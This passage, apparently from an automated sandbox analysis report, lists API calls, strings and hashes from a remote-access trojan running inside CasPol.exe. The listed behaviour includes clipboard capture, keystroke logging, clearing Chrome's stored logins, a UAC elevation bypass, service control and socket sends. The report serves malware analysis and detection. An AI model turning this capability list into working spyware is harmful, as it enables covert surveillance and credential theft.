                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3520204547-0
                                                                                                                                                              • Opcode ID: 19469a6e28cc22ba2c515ea9a8a3fee8ee13006a00461d7d6bf062bbdebaba07
                                                                                                                                                              • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                                                                              • Opcode Fuzzy Hash: 19469a6e28cc22ba2c515ea9a8a3fee8ee13006a00461d7d6bf062bbdebaba07
                                                                                                                                                              • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,PFb,004742F8), ref: 0041B489
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,PFb,004742F8), ref: 0041B4BB
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,PFb,004742F8), ref: 0041B529
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,PFb,004742F8), ref: 0041B536
                                                                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,PFb,004742F8), ref: 0041B50C
                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,PFb,004742F8), ref: 0041B561
                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,PFb,004742F8), ref: 0041B568
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,PFb,004742F8), ref: 0041B570
                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,PFb,004742F8), ref: 0041B583
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                              • String ID: PFb
                                                                                                                                                              • API String ID: 2341273852-2523012949
                                                                                                                                                              • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                              • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                                                              • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                              • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                              • API String ID: 0-3177665633
                                                                                                                                                              • Opcode ID: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                                                              • Opcode Fuzzy Hash: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                                                              APIs
                                                                                                                                                              • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                              • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                                                              • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                              • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                              • String ID: 8[G
                                                                                                                                                              • API String ID: 1888522110-1691237782
                                                                                                                                                              • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                                                              • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                                                                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                                                              APIs
                                                                                                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object_wcslen
                                                                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                              • API String ID: 240030777-3166923314
                                                                                                                                                              • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                                                              • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00419935
                                                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3587775597-0
                                                                                                                                                              • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                                                              • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                                                                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                                                                                              • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                                                              • API String ID: 341183262-3780268858
                                                                                                                                                              • Opcode ID: 5c8a31f4481922b84067e9b3f6ac6124fb2943dfdd0e912f2a7836fd7761b1ac
                                                                                                                                                              • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                                                              • Opcode Fuzzy Hash: 5c8a31f4481922b84067e9b3f6ac6124fb2943dfdd0e912f2a7836fd7761b1ac
                                                                                                                                                              • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                              • API String ID: 2127411465-314212984
                                                                                                                                                              • Opcode ID: 82c1d97d15fdcd07ac7be49d161d1597f6d3df80dbf8fd8b3beaffeef27963c7
                                                                                                                                                              • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                                                                              • Opcode Fuzzy Hash: 82c1d97d15fdcd07ac7be49d161d1597f6d3df80dbf8fd8b3beaffeef27963c7
                                                                                                                                                              • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                              Strings
                                                                                                                                                              • UserProfile, xrefs: 0040B227
                                                                                                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                                                                              • Opcode ID: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                                                                                              • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                                                                              • Opcode Fuzzy Hash: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                                                                                              • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,0064BB38,00000010), ref: 004042A5
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002F8,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(000002F8,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4043647387-0
                                                                                                                                                              • Opcode ID: ea13f7683f6f091a77670021696f9811019f57dab70408bb2bf5d7a912ed8442
                                                                                                                                                              • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                                                                              • Opcode Fuzzy Hash: ea13f7683f6f091a77670021696f9811019f57dab70408bb2bf5d7a912ed8442
                                                                                                                                                              • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 276877138-0
                                                                                                                                                              • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                                                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                                                                              • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                                                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                                                                              • Opcode ID: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                                                                                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                                                                              • Opcode Fuzzy Hash: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                                                                                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                                                              APIs
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                                                                                              • GetACP.KERNEL32 ref: 004512BA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                                                                              APIs
                                                                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                              • String ID: SETTINGS
                                                                                                                                                              • API String ID: 3473537107-594951305
                                                                                                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
